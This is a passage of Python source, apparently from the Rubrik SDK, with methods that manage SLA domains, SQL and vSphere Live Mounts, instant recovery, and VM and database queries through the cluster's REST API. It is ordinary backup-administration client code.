config["frequencies"]["yearly"]["dayOfYear"] = "LastDay"
config["frequencies"]["yearly"]["frequency"] = yearly_frequency
config["frequencies"]["yearly"]["retention"] = yearly_retention
else:
# Create the config for v1 endpoint
frequencies = []
if hourly_frequency is not None:
frequencies.append({
"timeUnit": "Hourly",
"frequency": hourly_frequency,
"retention": hourly_retention
})
if daily_frequency is not None:
frequencies.append({
"timeUnit": "Daily",
"frequency": daily_frequency,
"retention": daily_retention
})
if monthly_frequency is not None:
frequencies.append({
"timeUnit": "Monthly",
"frequency": monthly_frequency,
"retention": monthly_retention
})
if yearly_frequency is not None:
frequencies.append({
"timeUnit": "Yearly",
"frequency": yearly_frequency,
"retention": yearly_retention
})
config["frequencies"] = frequencies
if archive_name is not None:
archival_location_id = self.object_id(
archive_name, "archival_location", timeout=timeout)
# convert retention in days to seconds
retention_on_brik_in_seconds = retention_on_brik_in_days * 86400
if instant_archive is False:
archival_threshold = retention_on_brik_in_seconds
else:
archival_threshold = 1
config["localRetentionLimit"] = retention_on_brik_in_seconds
config["archivalSpecs"] = [{
"locationId": archival_location_id,
"archivalThreshold": archival_threshold
}]
if sla_id is not False:
self.log(
"create_sla: Getting the configuration details for the SLA Domain {} already on the Rubrik cluster.".format(name))
if v2_sla is True:
current_sla_details = self.get(
"v2", "/sla_domain/{}".format(sla_id), timeout=timeout)
else:
current_sla_details = self.get(
"v1", "/sla_domain/{}".format(sla_id), timeout=timeout)
keys_to_delete = [
"id",
"primaryClusterId",
"allowedBackupWindows",
"firstFullAllowedBackupWindows",
"archivalSpecs",
"replicationSpecs",
"numDbs",
"numOracleDbs",
"numFilesets",
"numHypervVms",
"numNutanixVms",
"numManagedVolumes",
"numStorageArrayVolumeGroups",
"numWindowsVolumeGroups",
"numLinuxHosts",
"numShares",
"numWindowsHosts",
"numVms",
"numEc2Instances",
"numVcdVapps",
"numProtectedObjects",
"isDefault",
"uiColor",
"maxLocalRetentionLimit",
"showAdvancedUi",
"advancedUiConfig"]
if archive_name is not None:
keys_to_delete.remove("archivalSpecs")
current_sla_details["localRetentionLimit"] = archival_threshold
for key in keys_to_delete:
try:
del current_sla_details[key]
except KeyError:
pass
if config == current_sla_details:
return "No change required. The {} SLA Domain is already configured with the provided configuration.".format(
name)
else:
raise InvalidParameterException(
"The Rubrik cluster already has an SLA Domain named '{}' whose configuration does not match the values provided.".format(name))
self.log("create_sla: Creating the new SLA")
if v2_sla is True:
return self.post("v2", "/sla_domain", config, timeout=timeout)
else:
return self.post("v1", "/sla_domain", config, timeout=timeout)
def delete_sla(self, name, timeout=15):
"""Delete an SLA from the Rubrik Cluster
Arguments:
name {[type]} -- The name of the SLA you wish to delete.
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection to the Rubrik cluster. (default: {15})
Returns:
dict -- The full API response for `DELETE /v1/sla_domain`.
dict -- The full API response for `DELETE /v2/sla_domain`.
"""
self.function_name = inspect.currentframe().f_code.co_name
try:
# object_id() will set sla_already_present to something besides False if the SLA is already on the cluter
sla_id = self.object_id(name, "sla", timeout=timeout)
except InvalidParameterException:
return "No change required. The SLA Domain '{}' is not on the Rubrik cluster.".format(name)
try:
self.log("delete_sla: Attempting to delete the SLA using the v1 API")
delete_sla = self.delete("v1", "/sla_domain/{}".format(sla_id))
except APICallException as api_response:
if "SLA Domains created/updated using v2 rest api version cannot be deleted from v1" in str(api_response):
self.log(
"delete_sla: SLA Domains created with the v2 endpoint can not be deleted by the v1 endpoint. Attempting to delete the SLA using the v2 API")
delete_sla = self.delete("v2", "/sla_domain/{}".format(sla_id))
else:
raise APICallException(api_response)
return delete_sla
def _time_in_range(self, start, end, point_in_time):
"""Checks if a specific datetime exists in a start and end time. For example:
checks if a recovery point exists in the available snapshots
Arguments:
start {datetime} -- The start time of the recoverable range the database can be mounted from.
end {datetime} -- The end time of the recoverable range the database can be mounted from.
point_in_time {datetime} -- The point_in_time you wish to Live Mount.
Returns:
bool -- True if point_in_time is in the range [start, end]."""
if self.function_name == "":
self.function_name = inspect.currentframe().f_code.co_name
if start <= end:
return start <= point_in_time <= end
else:
return start <= point_in_time or point_in_time <= end
def sql_live_mount(self, db_name, sql_instance, sql_host, mount_name, date='latest', time='latest', timeout=30): # pylint: ignore
"""Live Mount a database from a specified recovery point.
Arguments:
db_name {str} -- The name of the database to Live Mount.
sql_instance {str} -- The SQL instance name with the database you wish to Live Mount.
sql_host {str} -- The SQL Host of the database/instance to Live Mount.
mount_name {str} -- The name given to the Live Mounted database i.e. AdventureWorks_Clone.
Keyword Arguments:
date {str} -- The recovery_point date to recovery to formated as `Month-Day-Year` (ex: 1-15-2014). If `latest` is specified, the last snapshot taken will be used. (default: {'latest'})
time {str} -- The recovery_point time to recovery to formated as `Hour:Minute AM/PM` (ex: 1:30 AM). If `latest` is specified, the last snapshot taken will be used. (default: {'latest'})
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {30})
Returns:
dict -- The full response of `POST /v1/mssql/db/{id}/mount`.
"""
if date != 'latest' and time == 'latest' or date == 'latest' and time != 'latest':
raise InvalidParameterException(
"The date and time arguments most both be 'latest' or a specific date and time.")
if self.function_name == "":
self.function_name = inspect.currentframe().f_code.co_name
mssql_id = self._validate_sql_db(db_name, sql_instance, sql_host)
recovery_point = self._validate_sql_recovery_point(
mssql_id, date, time)
try:
if not recovery_point['is_recovery_point']:
raise InvalidParameterException(
"The database '{}' does not have a recovery_point taken on {} at {}.".format(
db_name, date, time))
except NameError:
pass
else:
config = {}
config['recoveryPoint'] = {
'timestampMs': recovery_point['recovery_timestamp']}
config['mountedDatabaseName'] = mount_name
self.log(
"sql_live_mount: Live Mounting the database from recovery_point on {} at {} as database '{}'.".format(
date,
time,
mount_name))
return self.post('v1', '/mssql/db/{}/mount'.format(mssql_id), config, timeout)
def vsphere_live_unmount(self, mounted_vm_name, force=False, timeout=30): # pylint: ignore
"""Delete a vSphere Live Mount from the Rubrik cluster.
Arguments:
mounted_vm_name {str} -- The name of the Live Mounted vSphere VM to be unmounted.
Keyword Arguments:
force {bool} -- Force unmount to remove metadata when the datastore of the Live Mount virtual machine was moved off of the Rubrik cluster. (default: {False})
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {30})
Returns:
dict -- The full response of `DELETE '/vmware/vm/snapshot/mount/{id}?force={bool}'.
"""
self.function_name = inspect.currentframe().f_code.co_name
self.log("vsphere_live_unmount: Searching the Rubrik cluster for the Live Mount vSphere VM '{}'.".format(
mounted_vm_name))
mounted_vm_id = self.object_id(
mounted_vm_name, 'vmware', timeout=timeout)
self.log(
"vsphere_live_unmount: Getting the vSphere VM mount information from the Rubrik cluster.")
mount_summary = self.get(
'v1', '/vmware/vm/snapshot/mount', timeout=timeout)
self.log("vsphere_live_unmount: Getting the mount ID of the vSphere VM '{}'.".format(
mounted_vm_name))
for mountedvm in mount_summary['data']:
if mountedvm['mountedVmId'] == mounted_vm_id:
mount_id = mountedvm['id']
break
else:
raise InvalidParameterException(
"The mounted vSphere VM '{}' does not exist, please provide a valid instance".format(mounted_vm_name))
try:
mount_id
except NameError:
raise InvalidParameterException("The mounted vSphere VM '{}' does exist, please check the name you provided.".format(
mounted_vm_name))
else:
self.log(
"vsphere_live_unmount: Unmounting the vSphere VM '{}'.".format(mounted_vm_name))
return self.delete('v1', '/vmware/vm/snapshot/mount/{}?force={}'.format(mount_id, force), timeout)
def sql_live_unmount(self, mounted_db_name, sql_instance=None, sql_host=None, force=False, timeout=30): # pylint: ignore
"""Delete a Microsoft SQL Live Mount from the Rubrik cluster.
Arguments:
mounted_db_name {str} -- The name of the Live Mounted database to be unmounted.
Keyword Arguments:
sql_instance {str} -- The name of the MSSQL instance managing the Live Mounted database to be unmounted.
sql_host {str} -- The name of the MSSQL host running the Live Mounted database to be unmounted.
force {bool} -- Remove all data within the Rubrik cluster related to the Live Mount, even if the SQL Server database cannot be contacted. (default: {False})
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {30})
Returns:
dict -- The full response of `DELETE /mssql/db/mount/{id}?force={bool}`.
"""
self.function_name = inspect.currentframe().f_code.co_name
mounted_db_id = self._validate_sql_db(
mounted_db_name, sql_instance, sql_host)
self.log(
"sql_live_unmount: Getting the MSSQL mount information from the Rubrik cluster.")
mount_summary = self.get('v1', '/mssql/db/mount', timeout=timeout)
self.log("sql_live_unmount: Getting the mount ID of the mounted database '{}'.".format(
mounted_db_name))
for mounteddb in mount_summary['data']:
if mounteddb['mountedDatabaseId'] == mounted_db_id:
mount_id = mounteddb['id']
try:
mount_id
except NameError:
raise InvalidParameterException("A mount ID for '{}' does exist, please provide a valid Live Mounted database.".format(
mounted_db_name))
else:
self.log(
"sql_live_unmount: Unmounting the database '{}'.".format(mounted_db_name))
return self.delete('v1', '/mssql/db/mount/{}?force={}'.format(mount_id, force), timeout)
def get_vsphere_live_mount(self, vm_name, timeout=15): # pylint: ignore
"""Get existing Live Mounts for a vSphere VM.
Arguments:
vm_name {str} -- The name of the mounted vSphere VM.
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
dict -- The full response of `GET /v1/vmware/vm/snapshot/mount?vm_id={vm_id}`.
"""
self.function_name = inspect.currentframe().f_code.co_name
self.log(
"get_vsphere_live_mount: Searching the Rubrik cluster for the mounted vSphere VM '{}'.".format(vm_name))
vm_id = self.object_id(vm_name, 'vmware', timeout=timeout)
self.log(
"get_vsphere_live_mount: Getting Live Mounts of vSphere VM {}.".format(vm_name))
return self.get('v1', '/vmware/vm/snapshot/mount?vm_id={}'.format(vm_id), timeout)
def get_vsphere_live_mount_names(self, vm_name, timeout=15): # pylint: ignore
"""Get existing Live Mount VM name(s) for a vSphere VM.
Arguments:
vm_name {str} -- The name of the mounted vSphere VM.
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
list -- A list of the Live Mounted VM names.
"""
self.function_name = inspect.currentframe().f_code.co_name
self.log("get_vsphere_live_mount_names: Searching the Rubrik cluster for the mounted vSphere VM '{}'.".format(vm_name))
vm_id = self.object_id(vm_name, 'vmware', timeout=timeout)
self.log(
"get_vsphere_live_mount_names: Getting Live Mounts of vSphere VM {}.".format(vm_name))
mounted_vm = self.get(
'v1', '/vmware/vm/snapshot/mount?vm_id={}'.format(vm_id), timeout)
mounted_vm_name = []
for vm in mounted_vm['data']:
try:
vm_moid = vm['mountedVmId']
split_moid = vm_moid.split('-')
moid = split_moid[-2] + '-' + split_moid[-1]
self.log(
"get_vsphere_live_mount_names: Getting summary of VM with moid '{}'.".format(moid))
vm_data = self.get(
'v1', '/vmware/vm?moid={}'.format(moid), timeout)
mounted_vm_name.append(vm_data['data'][0]['name'])
except KeyError:
self.log(
"get_vsphere_live_mount_names: A Live Mount of vSphere VM '{}' is in progress.".format(vm_name))
continue
return mounted_vm_name
def _validate_sql_db(self, db_name, sql_instance, sql_host, timeout=30): # pylint: ignore
"""Checks whether a database exist on an SQL Instance and Host.
Arguments:
db_name {str} -- The name of the database.
sql_instance {str} -- The SQL instance.
sql_host {str} -- The SQL server hostname.
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {30})
Returns:
str -- The ID of the MSSQL database.
"""
self.function_name = inspect.currentframe().f_code.co_name
mssql_host_id = self.object_id(
sql_host, 'physical_host', timeout=timeout)
self.log(
"_validate_sql_db: Getting the list of instances on host {}.".format(sql_host))
mssql_instance = self.get(
'v1', '/mssql/instance?primary_cluster_id=local&root_id={}'.format(mssql_host_id), timeout=timeout)
for instance in mssql_instance['data']:
if instance['name'] == sql_instance:
sql_instance_id = instance['id']
break
else:
raise InvalidParameterException(
"The SQL instance {} does not exist, please provide a valid instance".format(sql_instance))
self.log(
"_validate_sql_db: Getting the list of databases on the instance {}, on host {}.".format(
sql_instance,
sql_host))
mssql_db = self.get(
'v1',
'/mssql/db?primary_cluster_id=local&instance_id={}'.format(
sql_instance_id),
timeout=timeout)
for db in mssql_db['data']:
if db['name'] == db_name:
mssql_id = db['id']
break
else:
raise InvalidParameterException(
"The database {} does not exist, please provide a valid database".format(db_name))
return mssql_id
def get_sql_live_mount(self, db_name, sql_instance=None, sql_host=None, timeout=30): # pylint: ignore
"""Retrieve the Live Mounts for a MSSQL source database.
Arguments:
db_name {str} -- The name of the source database with Live Mounts.
Keyword Arguments:
sql_instance {str} -- The SQL instance name of the source database.
sql_host {str} -- The SQL host name of the source database/instance.
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {30})
Returns:
dict -- The full response of `GET /v1/mssql/db/mount?source_database_id={id}`.
"""
self.function_name = inspect.currentframe().f_code.co_name
mssql_id = self._validate_sql_db(db_name, sql_instance, sql_host)
self.log(
"get_sql_live_mount: Getting the live mounts for mssql db id'{}'.".format(mssql_id))
return self.get('v1', '/mssql/db/mount?source_database_id={}'.format(mssql_id), timeout)
def _validate_sql_recovery_point(self, mssql_id, date, time, timeout=30): # pylint: ignore
"""Check whether the data and time provided is a valid recovery point for an MSSQL database
Arguments:
mssql_id {str} -- The ID of the database.
date {str} -- The recovery_point date formated as `Month-Day-Year` (ex: 1-15-2014).
time {str} -- The recovery_point time formated as `Hour:Minute AM/PM` (ex: 1:30 AM).
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {30})
Returns:
dict -- A dictionary with values {'is_recovery_point': bool, 'recovery_timestamp': datetime}.
"""
if self.function_name == "":
self.function_name = inspect.currentframe().f_code.co_name
is_recovery_point = False
if date and time == 'latest':
latest_data = self.get(
'v1', '/mssql/db/{}/snapshot'.format(mssql_id), timeout=timeout)
try:
latest_date_time = latest_data['data'][0]['date']
except:
raise InvalidParameterException(
"The database with ID {} does not have any existing snapshots.".format(mssql_id))
# Parsing latest snapshot time string value to a datetime object as YYYY-MM-DDTHH:MM
data_str = datetime.strptime(
latest_date_time[:16], '%Y-%m-%dT%H:%M')
# Create date & time strings from datetime object as MM-DD-YYYY & HH:MM AM/PM
date_str, time_str = [data_str.strftime(
'%m-%d-%Y'), data_str.strftime('%I:%M %p')]
# Convert the date & time to cluster timezone, see _date_time_conversion function for details
recovery_date_time = self._date_time_conversion(date_str, time_str)
# Parse again to datetime object
recovery_date_time = datetime.strptime(
recovery_date_time, '%Y-%m-%dT%H:%M')
# Create recovery timestamp in (ms) as integer from datetime object
recovery_timestamp = int(recovery_date_time.strftime('%s')) * 1000
is_recovery_point = True
else:
self.log(
"_validate_sql_recovery_point: Getting the recoverable range for db ID:'{}'.".format(mssql_id))
range_summary = self.get(
'v1', '/mssql/db/{}/recoverable_range'.format(mssql_id), timeout=timeout)
self.log(
"_validate_sql_recovery_point: Converting the provided date/time into UTC.")
# Convert the date & time to cluster timezone, see _date_time_conversion function for details
recovery_date_time = self._date_time_conversion(date, time)
# Parse to datetime object
recovery_date_time = datetime.strptime(
recovery_date_time, '%Y-%m-%dT%H:%M')
# Create recovery timestamp in (ms) as integer from datetime object
recovery_timestamp = int(recovery_date_time.strftime('%s')) * 1000
for range in range_summary['data']:
start_str, end_str = [range['beginTime'], range['endTime']]
# Parsing the range beginTime and endTime values to a datetime object as YYYY-MM-DDTHH:MM
start, end = [datetime.strptime(start_str[:16], '%Y-%m-%dT%H:%M'),
datetime.strptime(end_str[:16], '%Y-%m-%dT%H:%M')]
self.log(
"_validate_sql_recovery_point: Searching for the provided recovery_point.")
is_recovery_point = self._time_in_range(
start, end, recovery_date_time)
if not is_recovery_point:
continue
else:
break
return {
"is_recovery_point": is_recovery_point,
"recovery_timestamp": recovery_timestamp
}
def sql_instant_recovery(self, db_name, date, time, sql_instance=None, sql_host=None, finish_recovery=True, max_data_streams=0, timeout=30): # pylint: ignore
"""Perform an instant recovery for MSSQL database from a specified recovery point.
Arguments:
db_name {str} -- The name of the database to instantly recover.
date {str} -- The recovery_point date to recover to formated as `Month-Day-Year` (ex: 1-15-2014).
time {str} -- The recovery_point time to recover to formated as `Hour:Minute AM/PM` (ex: 1:30 AM).
Keyword Arguments:
sql_instance {str} -- The SQL instance name with the database to instantly recover.
sql_host {str} -- The SQL Host of the database/instance to instantly recover.
finish_recovery {bool} -- A Boolean value that determines the recovery option to use during database restore. When this value is 'true', the database is restored using the RECOVERY option and is fully functional at the end of the restore operation. When this value is 'false', the database is restored using the NORECOVERY option and remains in recovering mode at the end of the restore operation.
max_data_streams {int} -- Maximum number of parallel data streams that can be used to copy data to the target system.
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {30})
Returns:
dict -- The full response of `POST /v1/mssql/db/{id}/restore`.
"""
self.function_name = inspect.currentframe().f_code.co_name
mssql_id = self._validate_sql_db(db_name, sql_instance, sql_host)
recovery_point = self._validate_sql_recovery_point(
mssql_id, date, time)
try:
if recovery_point['is_recovery_point'] == False:
raise InvalidParameterException(
"The database '{}' does not have a recovery_point taken on {} at {}.".format(
db_name, date, time))
except NameError:
pass
else:
config = {}
config['recoveryPoint'] = {
'timestampMs': recovery_point['recovery_timestamp']}
config['finish_recovery'] = finish_recovery
config['max_data_streams'] = max_data_streams
self.log(
"sql_instant_recovery: Performing instant recovery of {} to recovery_point {} at {}.".format(
db_name,
date,
time))
return self.post('v1', '/mssql/db/{}/restore'.format(mssql_id), config, timeout)
def vcenter_refresh_vm(self, vm_name, timeout=15): # pylint: ignore
"""Refresh a single vSphere VM metadata.
Arguments:
vm_name {str} -- The name of the vSphere VM.
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
no content.
"""
self.function_name = inspect.currentframe().f_code.co_name
self.log(
"vcenter_refresh_vm: Searching the Rubrik cluster for the vSphere VM '{}'.".format(vm_name))
data = self.get('v1', '/vmware/vm?name={}'.format(vm_name), timeout)
if data['data'] == []:
raise InvalidParameterException(
"The vSphere VM '{}' does not exist.".format(vm_name))
else:
vcenter_id = data['data'][0]['infraPath'][0]['id']
vm_id = data['data'][0]['id']
self.log(
"vcenter_refresh_vm: Getting the MOID for vSphere VM {}.".format(vm_name))
split_moid = vm_id.split('-')
moid = split_moid[-2] + '-' + split_moid[-1]
config = {'vmMoid': moid}
self.log(
"vcenter_refresh_vm: Refreshing vSphere VM {} metadata.".format(vm_name))
self.post(
'internal', '/vmware/vcenter/{}/refresh_vm'.format(vcenter_id), config, timeout)
def get_vsphere_vm(self, name=None, is_relic=None, effective_sla_domain_id=None, primary_cluster_id=None, limit=None, offset=None, moid=None, sla_assignment=None, guest_os_name=None, sort_by=None, sort_order=None, timeout=15): # pylint: ignore
"""Get summary of all the VMs. Each keyword argument is a query parameter to filter the VM details returned i.e. you can query for a specific VM name, is_relic, effective_sla_domain etc.
Keyword Arguments:
name {str} -- Search by using a virtual machine name.
is_relic {bool} -- Filter by the isRelic field of the virtual machine. When this parameter is not set, return both relic and non-relic virtual machines.
effective_sla_domain_id {str} -- Filter by ID of effective SLA Domain.
primary_cluster_id {str} -- Filter by primary cluster ID, or local.
limit {int} -- Limit the number of matches returned.
offset {int} -- Ignore these many matches in the beginning.
moid {str} -- Search by using a virtual machine managed object ID.
sla_assignment {str} -- Filter by SLA Domain assignment type. (Direct, Derived, Unassigned)
guest_os_name {str} -- Filters by the name of operating system using infix search.
sort_by {str} -- Sort results based on the specified attribute. (effectiveSlaDomainName, name, moid, folderPath, infraPath)
sort_order {str} -- Sort order, either ascending or descending. (asc, desc)
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
dict -- The full response of `GET /v1/vmware/vm?{query}`
"""
if self.function_name == "":
self.function_name = inspect.currentframe().f_code.co_name
parameters = {'effective_sla_domain_id': effective_sla_domain_id,
'primary_cluster_id': primary_cluster_id,
'limit': limit,
'offset': offset,
'is_relic': is_relic,
'name': name,
'moid': moid,
'sla_assignment': sla_assignment,
'guest_os_name': guest_os_name,
'sort_by': sort_by,
'sort_order': sort_order}
parameters = {key: value for key,
value in parameters.items() if value is not None}
self.log("get_vsphere_vm: checking the provided query parameters.")
valid_sla_assignment = ['Derived', 'Direct', 'Unassigned']
for key, value in parameters.items():
if key == 'sla_assignment' and value not in valid_sla_assignment:
raise InvalidParameterException(
'The sla_assignment parameter must be one of the following: {}'.format(valid_sla_assignment))
valid_sort_by = ['effectiveSlaDomainName',
'name', 'moid', 'folderPath', 'infraPath']
for key, value in parameters.items():
if key == 'sort_by' and value not in valid_sort_by:
raise InvalidParameterException(
'The sort_by parameter must be one of the following: {}'.format(valid_sort_by))
valid_sort_order = ['asc', 'desc']
for key, value in parameters.items():
if key == 'sort_order' and value not in valid_sort_order:
raise InvalidParameterException(
'The sort_order parameter must be one of the following: {}'.format(valid_sort_order))
for key, value in parameters.items():
if key == 'is_relic' and not isinstance(value, bool):
raise InvalidParameterException(
'The is_relic paremeter must be a boolean: True or False')
for key, value in parameters.items():
if ((key == 'limit') or (key == 'offset')) and not isinstance(value, int):
raise InvalidParameterException(
'The limit and offset paremeter must be an integer')
# String joins by iterating through the key-value pairs in the parameters dictionary and concatenating it into a query
query = '&'.join(['%s=%s' % kv for kv in parameters.items()])
self.log("get_vsphere_vm: Get summary of all the VMs.")
return self.get('v1', '/vmware/vm?{}'.format(query), timeout)
def get_vsphere_vm_snapshot(self, vm_name, timeout=15): # pylint: ignore
"""Retrieve summary information for the snapshots of a virtual machine.
Arguments:
vm_name {str} -- Name of the virtual machine.
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection with the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
dict -- The full response of `GET /v1/vmware/vm/{vm_id}/snapshot`
"""
if self.function_name == "":
self.function_name = inspect.currentframe().f_code.co_name
self.log(
"get_vsphere_vm_snapshot: Searching the Rubrik cluster for the vSphere VM '{}'.".format(vm_name))
vm_id = self.object_id(vm_name, 'vmware', timeout=timeout)
self.log("get_vsphere_vm_snapshot: Getting summary information for the snapshots of virtual machine {}".format(vm_id))
return self.get('v1', '/vmware/vm/{}/snapshot'.format(vm_id), timeout)
def get_vsphere_vm_details(self, vm_name, timeout=15): # pylint: ignore
"""Retrieve details for a virtual machine.
Arguments:
vm_name {str} -- Name of the virtual machine.
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection with the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
dict -- The full response of `GET /v1/vmware/vm/{vm_id}`
"""
if self.function_name == "":
self.function_name = inspect.currentframe().f_code.co_name
self.log(
"get_vsphere_vm_details: Searching the Rubrik cluster for the vSphere VM '{}'.".format(vm_name))
vm_id = self.object_id(vm_name, 'vmware', timeout=timeout)
self.log(
"get_vsphere_vm_details: Getting details of virtual machine {}".format(vm_id))
return self.get('v1', '/vmware/vm/{}'.format(vm_id), timeout)
def get_vsphere_vm_file(self, vm_name, path, timeout=15): # pylint: ignore
"""Search for a file in the snapshots of a virtual machine. Specify the file by full path prefix or filename prefix.
Arguments:
vm_name {str} -- Name of the virtual machine.
path {str} -- The path query. Use either a path prefix or a filename prefix.
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection with the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
dict -- The full response of `GET /v1/vmware/vm/{vm_id}/search?path={path}`
"""
if self.function_name == "":
self.function_name = inspect.currentframe().f_code.co_name
self.log(
"get_vsphere_vm_file: Searching the Rubrik cluster for the vSphere VM '{}'.".format(vm_name))
vm_id = self.object_id(vm_name, 'vmware', timeout=timeout)
self.log(
"get_vsphere_vm_file: Search for file/path {} in the snapshots of a virtual machine {}".format(path, vm_id))
return self.get('v1', '/vmware/vm/{}/search?path={}'.format(vm_id, path), timeout)
def get_sql_db(self, db_name=None, instance=None, hostname=None, availability_group=None, effective_sla_domain=None, primary_cluster_id='local', sla_assignment=None, limit=None, offset=None, is_relic=None, is_live_mount=None, is_log_shipping_secondary=None, sort_by=None, sort_order=None, timeout=15): # pylint: ignore
"""Retrieves summary information for SQL databases. Each keyword argument is a query parameter to filter the database details returned i.e. you can query for a specific database name, hostname, instance, is_relic, effective_sla_domain etc.
Keyword Arguments:
db_name {str} -- Filter by a substring of the database name.
instance {str} -- The SQL instance name of the database.
hostname {str} -- The SQL host name of the database.
availability_group {str} -- Filter by the name of the Always On Availability Group.
effective_sla_domain {str} -- Filter by the name of the effective SLA Domain.
primary_cluster_id {str} -- Filter by primary cluster ID, or local.
sla_assignment {str} -- Filter by SLA Domain assignment type. (Direct, Derived, Unassigned)
limit {int} -- Limit the number of matches returned.
offset {int} -- Ignore these many matches in the beginning.
is_relic {bool} -- Filter database summary information by the value of the isRelic field.
is_live_mount {bool} -- Filter database summary information by the value of the isLiveMount field.
is_log_shipping_secondary {bool} -- Filter database summary information by the value of the isLogShippingSecondary field.
sort_by {str} -- Sort results based on the specified attribute. (effectiveSlaDomainName, name)
sort_order {str} -- Sort order, either ascending or descending. (asc, desc)
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
dict -- The full response of `GET /v1/mssql/db?{query}`
"""
if self.function_name == "":
self.function_name = inspect.currentframe().f_code.co_name
if availability_group is not None:
self.log("get_sql_db: Searching the Rubrik cluster for the ID of the availability_group {}.".format(
availability_group))
ag_summary = self.get(
'internal', '/mssql/availability_group', timeout=timeout)
for ag in ag_summary['data']:
if availability_group == ag['name']:
availability_group_id = ag['id']
else:
availability_group_id = None
if effective_sla_domain is not None:
self.log("get_sql_db: Searching the Rubrik cluster for the ID of the SLA Domain '{}'.".format(
effective_sla_domain))
effective_sla_domain_id = self.object_id(
effective_sla_domain, 'sla', timeout=timeout)
else:
effective_sla_domain_id = None
parameters = {'availability_group_id': availability_group_id,
'effective_sla_domain_id': effective_sla_domain_id,
'primary_cluster_id': primary_cluster_id,
'name': db_name,
'sla_assignment': sla_assignment,
'limit': limit,
'offset': offset,
'is_relic': is_relic,
'is_live_mount': is_live_mount,
'is_log_shipping_secondary': is_log_shipping_secondary,
'sort_by': sort_by,
'sort_order': sort_order}
parameters = {key: value for key,
value in parameters.items() if value is not None}
self.log("get_sql_db: checking the provided query parameters.")
valid_sla_assignment = ['Derived', 'Direct', 'Unassigned']
for key, value in parameters.items():
if key == 'sla_assignment' and value not in valid_sla_assignment:
raise InvalidParameterException(
'The sla_assignment parameter must be one of the following: {}'.format(valid_sla_assignment))
valid_sort_by = ['effectiveSlaDomainName', 'name']
for key, value in parameters.items():
if key == 'sort_by' and value not in valid_sort_by:
raise InvalidParameterException(
'The sort_by parameter must be one of the following: {}'.format(valid_sort_by))
valid_sort_order = ['asc', 'desc']
for key, value in parameters.items():
if key == 'sort_order' and value not in valid_sort_order:
raise InvalidParameterException(
'The sort_order parameter must be one of the following: {}'.format(valid_sort_order))
for key, value in parameters.items():
if ((key == 'is_relic') or (key == 'is_live_mount') or (
key == 'is_log_shipping_secondary')) and not isinstance(value, bool):
raise InvalidParameterException(
'The is_relic, is_live_mount, is_log_shipping_secondary paremeter must be a boolean: True or False')
for key, value in parameters.items():
if ((key == 'limit') or (key == 'offset')) and not isinstance(value, int):
raise InvalidParameterException(
'The limit and offset paremeter must be an integer')
# String joins by iterating through the key-value pairs in the parameters dictionary and concatenating it into a query
query = '&'.join(['%s=%s' % kv for kv in parameters.items()])
self.log(
"get_sql_db: Get summary of all the databases returned by the query.")
databases = self.get('v1', '/mssql/db?{}'.format(query), timeout)
result = []
if instance is None and hostname is None:
return databases['data']
elif instance is None and hostname is not None:
for item in databases['data']:
if item['rootProperties']['rootName'] == hostname:
result.append(item)
elif instance is not None and hostname is None:
try:
for item in databases['data']:
for replica in item['replicas']:
if replica['instanceName'] == instance:
result.append(item)
break
except BaseException:
pass
else:
result = [item for item in databases['data']
if replica['instanceName'] == instance]
elif instance is not None and hostname is not None:
try:
for item in databases['data']:
for replica in item['replicas']:
if item['rootProperties']['rootName'] == hostname and replica['instanceName'] == instance:
result.append(item)
break
except BaseException:
pass
else:
result = [
item for item in databases['data'] if (
item['rootProperties']['rootName'] == hostname and replica['instanceName'] == instance)]
return result
def get_sql_db_files(self, db_name, date, time, sql_instance=None, sql_host=None, timeout=15): # pylint: ignore
"""Provides a list of database files to be restored for the specified restore or export operation. The Data, Log and Filestream files will be retrieved along with name and path information.
Arguments:
db_name {str} -- The name of the database.
date {str} -- The recovery_point date formated as 'Month-Date-Year' (ex: 8-9-2018).
time {str} -- The recovery_point time formated as `Hour:Minute` (ex: 3:30 AM).
Keyword Arguments:
sql_instance {str} -- The SQL instance name with the database.
sql_host {str} -- The SQL Host of the database/instance.
timeout {int} -- The number of seconds to wait to establish a connection with the Rubrik cluster before returning a timeout error. (default: {30})
Returns:
list -- The full response of `GET /internal/mssql/db/{id}/restore_files?time={recovery_point}`.
"""
if self.function_name == "":
self.function_name = inspect.currentframe().f_code.co_name
mssql_id = self._validate_sql_db(db_name, sql_instance, sql_host)
recovery_date_time = self._date_time_conversion(date, time)
recovery_point = datetime.strptime(
recovery_date_time, '%Y-%m-%dT%H:%M').isoformat()
valid_recovery_point = self._validate_sql_recovery_point(
mssql_id, date, time)
try:
if valid_recovery_point['is_recovery_point'] == False:
raise InvalidParameterException(
"The database '{}' does not have a recovery_point taken on {} at {}.".format(
db_name, date, time))
except NameError:
pass
else:
self.log(
"get_sql_db_files: Getting SQL database '{}' files for recovery_point {} {}.".format(
db_name,
date,
time))
return self.get('internal', '/mssql/db/{}/restore_files?time={}'.format(mssql_id, recovery_point), timeout)
